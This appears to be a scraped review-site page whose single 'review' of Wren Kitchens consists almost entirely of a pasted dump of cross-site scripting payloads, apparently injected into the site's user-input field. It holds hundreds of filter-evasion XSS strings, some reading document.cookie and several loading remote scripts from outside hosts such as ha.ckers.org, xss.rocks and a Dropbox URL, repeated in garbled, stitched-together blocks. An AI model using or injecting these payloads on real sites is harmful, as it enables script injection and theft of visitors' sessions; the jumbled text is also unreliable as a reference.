Jewellery

Wren

Wren Kitchens

Absolutely shoddy service and poor communication. Read More →

oqq

javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); ‘`”>javascript:alert(1) ‘`”>javascript:alert(1) \x3Cscript>javascript:alert(1) ‘”`>/* *\x2Fjavascript:alert(1)// */ javascript:alert(1)</script\x0D javascript:alert(1)</script\x0A javascript:alert(1)</script\x0B javascript:alert(1) <!–\x3E –> –> –> –> –> –> `”‘> test “‘`>a=’hello\x27;javascript:alert(1)//'; test test test test test test test test test test test test test test /* *\x2A/javascript:alert(1)// */ /* *\x00/javascript:alert(1)// */ </style\x3E </style\x0D </style\x09 </style\x20 </style\x0A “‘`>ABCDEF “‘`>ABCDEF if(“x\\xE1\x96\x89″.length==2) { javascript:alert(1);} if(“x\\xE0\xB9\x92″.length==2) { javascript:alert(1);} if(“x\\xEE\xA9\x93″.length==2) { javascript:alert(1);} ‘`”>javascript:alert(1) ‘`”>javascript:alert(1) “‘`> “‘`> javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> “`’>\x3Bjavascript:alert(1) “`’>\x0Djavascript:alert(1) “`’>\xEF\xBB\xBFjavascript:alert(1) “`’>\xE2\x80\x81javascript:alert(1) “`’>\xE2\x80\x84javascript:alert(1) “`’>\xE3\x80\x80javascript:alert(1) “`’>\x09javascript:alert(1) “`’>\xE2\x80\x89javascript:alert(1) “`’>\xE2\x80\x85javascript:alert(1) “`’>\xE2\x80\x88javascript:alert(1) “`’>\x00javascript:alert(1) “`’>\xE2\x80\xA8javascript:alert(1) “`’>\xE2\x80\x8Ajavascript:alert(1) “`’>\xE1\x9A\x80javascript:alert(1) “`’>\x0Cjavascript:alert(1) “`’>\x2Bjavascript:alert(1) “`’>\xF0\x90\x96\x9Ajavascript:alert(1) “`’>-javascript:alert(1) “`’>\x0Ajavascript:alert(1) “`’>\xE2\x80\xAFjavascript:alert(1) “`’>\x7Ejavascript:alert(1) “`’>\xE2\x80\x87javascript:alert(1) “`’>\xE2\x81\x9Fjavascript:alert(1) “`’>\xE2\x80\xA9javascript:alert(1) “`’>\xC2\x85javascript:alert(1) “`’>\xEF\xBF\xAEjavascript:alert(1) “`’>\xE2\x80\x83javascript:alert(1) “`’>\xE2\x80\x8Bjavascript:alert(1) “`’>\xEF\xBF\xBEjavascript:alert(1) “`’>\xE2\x80\x80javascript:alert(1) “`’>\x21javascript:alert(1) “`’>\xE2\x80\x82javascript:alert(1) “`’>\xE2\x80\x86javascript:alert(1) “`’>\xE1\xA0\x8Ejavascript:alert(1) “`’>\x0Bjavascript:alert(1) “`’>\x20javascript:alert(1) “`’>\xC2\xA0javascript:alert(1) “/> “/> “/> “/> “/> “/> “/> “/> “/> javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> javascript:alert(1) <video poster=javascript:javascript:alert(1)// …………… X X CLICKME CLICKME <!– <img src=" <img src=" XXX javascript:alert(1) <b alert(1)0 document.getElementById(“div2″).innerHTML = document.getElementById(“div1″).innerHTML; x javascript:alert(1)”> javascript:alert(1)”> javascript:alert(1)”> javascript:alert(1)’>”> javascript:alert(1)”> javascript:alert(1)”> d.innerHTML=d.innerHTML XXX <img src="x` `javascript:alert(1)”` `> “> <!–[if –> X p[foo=bar{}*{-o-link:’javascript:javascript:alert(1)’}{}*{-o-link-source:current}]{color:red}; <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d @import “data:,*%7bx:expression(javascript:alert(1))%7D”; XXXXXX *[{}@import’%(css)s?]X XXX XXX *{x:expression(javascript:alert(1))} X X with(document.getElementById(“d”))innerHTML=innerHTML X X XXX #x{font-family:foo[bar;color:green;} #y];color:red;{} XXX ({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval ({0:#0=eval/#0#/#0#(javascript:alert(1))}) ReferenceError.prototype.__defineGetter__(‘name’, function(){javascript:alert(1)}),x Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘javascript:alert(1)’)() &ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi &alert&A7&(1)&R&UA;&& ¼script¾javascript:alert(1)¼/script¾ X 1 1 1 XXX x %(payload)s javascript:alert(1) <SCRIPT SRC=%(jscript)s? <%(payload)s//< <IMG SRC="javascript:javascript:alert(1)" <iframe src=%(scriptlet)s < @import’%(css)s'; <META HTTP-EQUIV="Link" Content="; REL=stylesheet”> li {list-style-image: url(“javascript:javascript:alert(1)”);}XSS javascript:alert(1); .XSS{background-image:url(“javascript:javascript:alert(1)”);} BODY{background:url(“javascript:javascript:alert(1)”)} XSS”””,”XML namespace.”),(“””<IMG SRC=”javascript:javascript:alert(1)”> +ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- X @import’%(css)s'; a{background:url(‘s1′ ‘s2)}@import javascript:javascript:alert(1);’);} &&javascript:alert(1)&&;&& javascript:alert(1); <![CDATA[<IMG SRC="javas]]]] test1 test1 <embed width=500 height=500 code="data:text/html,%(payload)s”> “> ‘;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//– >”>’>alert(String.fromCharCode(88,83,83)) ”;!–“= xxs link xxs link alert(“XSS”)”> perl -e ‘print “”;’ > out <alert(“XSS”);//< <SCRIPT SRC=http://ha.ckers.org/xss.js? <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// alert(“XSS”); li {list-style-image: url(“javascript:alert(‘XSS’)”);}XSS @import’http://ha.ckers.org/xss.css'; <META HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss”)} @im\port’\ja\vasc\ript:alert(“XSS”)'; exp/* alert(‘XSS’); .XSS{background-image:url(“javascript:alert(‘XSS’)”);} BODY{background:url(“javascript:alert(‘XSS’)”)} BODY{background:url(“javascript:alert(‘XSS’)”)} ¼script¾alert(¢XSS¢)¼/script¾ <!–#exec cmd="/bin/echo ' <? echo('alert(“XSS”)’); ?> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)”> +ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- ” SRC=”http://ha.ckers.org/xss.js”> ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ` SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> XSS XSS XSS XSS XSS XSS {font-family&colon;” <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <isindex formaction="javascript&colon;confirm(1)" <img src=`%00`&NewLine; onerror=alert(1)&NewLine; prompt(1)</ScRipT giveanswerhere=? /*%00*/alert(1)/*%00*/</script /*%00*/ ">%00 <iframe/src="data:text/html,”> </script <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X http://www.alert(1)</script .com alert(1) click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script alert(1) ClickMe alert(1) </script 1=2 style=”x:”> <–` –!> x “> CLICKME click Click Me ‘; alert(1); ‘)alert(1);// alert(1) {font-family&colon;” <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <isindex formaction="javascript&colon;confirm(1)" <img src=`%00`&NewLine; onerror=alert(1)&NewLine; prompt(1)</ScRipT giveanswerhere=? /*%00*/alert(1)/*%00*/</script /*%00*/ ">%00 <iframe/src="data:text/html,”> </script <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X http://www.alert(1)</script .com alert(1) click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script alert(1) ClickMe alert(1) </script 1=2 style=”x:”> <–` –!> x “> CLICKME click Click Me String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41) ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) alert(“XSS”)”> <alert(“XSS”);//< %253cscript%253ealert(1)%253c/script%253e “>alert(document.cookie) fooalert(1) <script>alert(1)</script> <IMG SRC=”javascript:alert(‘XSS’)” <iframe src=http://ha.ckers.org/scriptlet.html < javascript:alert("hellox worldss") “>’>alert(String.fromCharCode(88,83,83)) ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> <alert(“XSS”);//< “>’>alert(String.fromCharCode(88,83,83)) ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))&submit.x=27&submit.y=9&cmd=search alert(“hellox worldss”)&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 alert(“XSS”);&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//\”;alert(String.fromCharCode(88,83,83)%?29//–>”>’>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search hellox worldss … lol <!– <img src=" alert(1)”> alert(1)”> alert(1)”> alert(1)’>”> alert(1)”> alert(123)”> LOL LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;} ({0:#0=alert/#0#/#0#(0)}) LOLalert(123) <SCRIPT>alert(/XSS/.source)</SCRIPT> \\”;alert(‘XSS’);// </TITLE><SCRIPT>alert(\”XSS\”);</SCRIPT> <INPUT TYPE=\”IMAGE\” SRC=\”javascript:alert(‘XSS’);\”> <BODY BACKGROUND=\”javascript:alert(‘XSS’)\”> <BODY ONLOAD=alert(‘XSS’)> <IMG DYNSRC=\”javascript:alert(‘XSS’)\”> <IMG LOWSRC=\”javascript:alert(‘XSS’)\”> <BGSOUND SRC=\”javascript:alert(‘XSS’);\”> <BR SIZE=\”\”> <LAYER SRC=\”http://ha.ckers.org/scriptlet.html\”></LAYER> <LINK REL=\”stylesheet\” HREF=\”javascript:alert(‘XSS’);\”> <LINK REL=\”stylesheet\” HREF=\”http://ha.ckers.org/xss.css\”> <STYLE>@import’http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV=\”Link\” Content=\”<http://ha.ckers.org/xss.css>; REL=stylesheet\”> <STYLE>BODY{-moz-binding:url(\”http://ha.ckers.org/xssmoz.xml#xss\”)}</STYLE> <XSS STYLE=\”behavior: url(xss.htc);\”> <STYLE>li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}</STYLE><UL><LI>XSS <IMG SRC=’vbscript:msgbox(\”XSS\”)’> <IMG SRC=\”mocha:[code]\”> <IMG SRC=\”livescript:[code]\”> žscriptualert(EXSSE)ž/scriptu <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(‘XSS’);\”> <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”> <META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http://;URL=javascript:alert(‘XSS’);\” <IFRAME SRC=\”javascript:alert(‘XSS’);\”></IFRAME> <FRAMESET><FRAME SRC=\”javascript:alert(‘XSS’);\”></FRAMESET> <TABLE BACKGROUND=\”javascript:alert(‘XSS’)\”> <TABLE><TD BACKGROUND=\”javascript:alert(‘XSS’)\”> <DIV STYLE=\”background-image: url(javascript:alert(‘XSS’))\”> <DIV STYLE=\”background-image:07507206C028’06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029’029\”> <DIV STYLE=\”background-image: url(javascript:alert(‘XSS’))\”> <DIV STYLE=\”width: expression(alert(‘XSS’));\”> <STYLE>@im\port’\ja\vasc\ript:alert(\”XSS\”)';</STYLE> <IMG STYLE=\”xss:expr/*XSS*/ession(alert(‘XSS’))\”> <XSS STYLE=\”xss:expression(alert(‘XSS’))\”> exp/*<A STYLE=’no\xss:noxss(\”*//*\”); xss:ex/*XSS*//*/*/pression(alert(\”XSS\”))’> <STYLE TYPE=\”text/javascript\”>alert(‘XSS’);</STYLE> <STYLE>.XSS{background-image:url(\”javascript:alert(‘XSS’)\”);}</STYLE><A CLASS=XSS></A> <STYLE type=\”text/css\”>BODY{background:url(\”javascript:alert(‘XSS’)\”)}</STYLE> <!–[if gte IE 4]> <SCRIPT>alert(‘XSS’);</SCRIPT> <![endif]–> <BASE HREF=\”javascript:alert(‘XSS’);//\”> <OBJECT TYPE=\”text/x-scriptlet\” DATA=\”http://ha.ckers.org/scriptlet.html\”></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(‘XSS’)></OBJECT> <EMBED SRC=\”http://ha.ckers.org/xss.swf\” AllowScriptAccess=\”always\”></EMBED> <EMBED SRC=\”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\” type=\”image/svg+xml\” AllowScriptAccess=\”always\”></EMBED> a=\”get\”; b=\”URL(\\”\”; c=\”javascript:\”; d=\”alert(‘XSS’);\\”)\”; eval(a+b+c+d); <HTML xmlns:xss><?import namespace=\”xss\” implementation=\”http://ha.ckers.org/xss.htc\”><xss:xss>XSS</xss:xss></HTML> <XML ID=I><X><C><![CDATA[<IMG SRC=\”javas]]><![CDATA[cript:alert(‘XSS’);\”>]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID=\”xss\”><I><B><IMG SRC=\”javas<!– –>cript:alert(‘XSS’)\”></B></I></XML> <SPAN DATASRC=\”#xss\” DATAFLD=\”B\” DATAFORMATAS=\”HTML\”></SPAN> <XML SRC=\”xsstest.xml\” ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix=\”t\” ns=\”urn:schemas-microsoft-com:time\”> <?import namespace=\”t\” implementation=\”#default#time2\”> <t:set attributeName=\”innerHTML\” to=\”XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\”> </BODY></HTML> <SCRIPT SRC=\”http://ha.ckers.org/xss.jpg\”></SCRIPT> <!–#exec cmd=\”/bin/echo ‘<SCR’\”–><!–#exec cmd=\”/bin/echo ‘IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>’\”–> <? echo(‘<SCR)'; echo(‘IPT>alert(\”XSS\”)</SCRIPT>’); ?> <IMG SRC=\”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\”> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV=\”Set-Cookie\” Content=\”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>\”> <HEAD><META HTTP-EQUIV=\”CONTENT-TYPE\” CONTENT=\”text/html; charset=UTF-7\”> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- <SCRIPT a=\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT =\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=\”>\” ” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT \”a=’>’\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=`>` SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=\”>’>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT>document.write(\”<SCRI\”);</SCRIPT>PT SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <A HREF=\”http://66.102.7.147/\”>XSS</A> <A HREF=\”http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\”>XSS</A> <A HREF=\”http://1113982867/\”>XSS</A> <A HREF=\”http://0x42.0x0000066.0x7.0x93/\”>XSS</A> <A HREF=\”http://0102.0146.0007.00000223/\”>XSS</A> <A HREF=\”htt p://6 6.000146.0x7.147/\”>XSS</A> <A HREF=\”//www.google.com/\”>XSS</A> <A HREF=\”//google\”>XSS</A> <A HREF=\”http://ha.ckers.org@google\”>XSS</A> <A HREF=\”http://google:ha.ckers.org\”>XSS</A> <A HREF=\”http://google.com/\”>XSS</A> <A HREF=\”http://www.google.com./\”>XSS</A> <A HREF=\”javascript:document.location=’http://www.google.com/’\”>XSS</A> <A HREF=\”http://www.gohttp://www.google.com/ogle.com/\”>XSS</A> < %3C &lt < &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 < &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c < < < < < < &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c < < < < < < &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C < < < < < < &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C < < < < < < \x3c \x3C \u003c \u003C <iframe src=http://ha.ckers.org/scriptlet.html> <IMG SRC=\”javascript:alert(‘XSS’)\” <SCRIPT SRC=//ha.ckers.org/.js> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <<SCRIPT>alert(\”XSS\”);//<</SCRIPT> <SCRIPT/SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\”XSS\”)> <SCRIPT/XSS SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <IMG SRC=\” javascript:alert(‘XSS’);\”> perl -e ‘print \”<SCRIPT>alert(\\”XSS\\”)</SCRIPT>\”;’ > out perl -e ‘print \”<IMG SRC=javascript:alert(\\”XSS\\”)>\”;’ > out <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG \”\”\”><SCRIPT>alert(\”XSS\”)</SCRIPT>\”> <IMG SRC=`javascript:alert(\”RSnake says, ‘XSS’\”)`> <IMG SRC=javascript:alert("XSS")> <IMG SRC=JaVaScRiPt:alert(‘XSS’)> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=\”javascript:alert(‘XSS’);\”> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> ”;!–\”<XSS>=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//\\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>\”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) ”;!–“= alert(“XSS”)”> <alert(“XSS”);//< a=/XSS/alert(a.source) \”;alert(‘XSS’);// alert(“XSS”); ¼script¾alert(¢XSS¢)¼/script¾ @im\port’\ja\vasc\ript:alert(“XSS”)'; exp/* a=”get”;b=”URL(ja\””;c=”vascr”;d=”ipt:ale”;e=”rt(‘XSS’);\”)”;eval(a+b+c+d+e); document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> TESTHTML5FORMACTION crosssitespt <!– <img src=" alert(1)”> alert(1)”> alert(1)”> ({0:#0=alert/#0#/#0#(123)}) ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(123)}),x Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)() {alert(1)};1 crypto.generateCRMFRequest(‘CN=0′,0,0,null,’alert(1)’,384,null,’rsa-dual-use’) alert(1) +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “>alert(document.cookie) “>alert(document.cookie) “><alert(document.cookie);//< fooalert(document.cookie) <script>alert(document.cookie)</script> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo\’; alert(document.cookie);//’; alert(document.cookie) alert(1) “>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101)) ‘;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) ”;!–“=0\”autofocus/onfocus=alert(1)–>”-confirm(3)-” xxs link xxs link alert(“XSS”)”> <alert(“XSS”);//< <SCRIPT SRC=http://ha.ckers.org/xss.js? <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// alert(‘XSS’); alert(“XSS”); li {list-style-image: url(“javascript:alert(‘XSS’)”);}XSS @import’http://ha.ckers.org/xss.css'; <META HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss”)} @im\port’\ja\vasc\ript:alert(“XSS”)'; exp/* alert(‘XSS’); .XSS{background-image:url(“javascript:alert(‘XSS’)”);} BODY{background:url(“javascript:alert(‘XSS’)”)} ¼script¾alert(¢XSS¢)¼/script¾ <!–#exec cmd="/bin/echo ' <? echo('alert(“XSS”)’); ?> <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)”> +ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- ” SRC=”http://ha.ckers.org/xss.js”> ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ` SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> XSS 0\”autofocus/onfocus=alert(1)–>”-confirm(3)-” veris–>group element[attribute=’ [
[” onmouseover=”alert(‘RVRSH3LL_XSS’);” ] %22;alert%28%27RVRSH3LL_XSS%29// javascript:alert%281%29; alert;pg(“XSS”) for((i)in(self))eval(i)(1) <script>alert(1)</script><script>alert(1)</script> <sCRiPt>alert(1)</SCrIPt> test %253Cscript%253Ealert(‘XSS’)%253C%252Fscript%253E <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; “>”>123 “>123 “>123 “>alert(`TEXT YOU WANT TO BE DISPLAYED`);123 “>123 >Hover the cursor to the LEFT of this Message&ParamHeight=250 “>”>123 “>123 <iframe src=http://xss.rocks/scriptlet.html < {font-family&colon;” <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" alert&lpar;1&rpar; {Opera} <img/src=“ onerror=this.onerror=confirm(1) <isindex formaction="javascript&colon;confirm(1)" <img src=“&NewLine; onerror=alert(1)&NewLine; prompt(1)</ScRipT giveanswerhere=? /**/alert(1)/**/</script /**/ "> <iframe/src="data:text/html,”> <script xlink:href=data&colon;,window.open('https://www.google.com/') </script <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe// src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X http://www.alert(1)</script .com alert(1) click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script

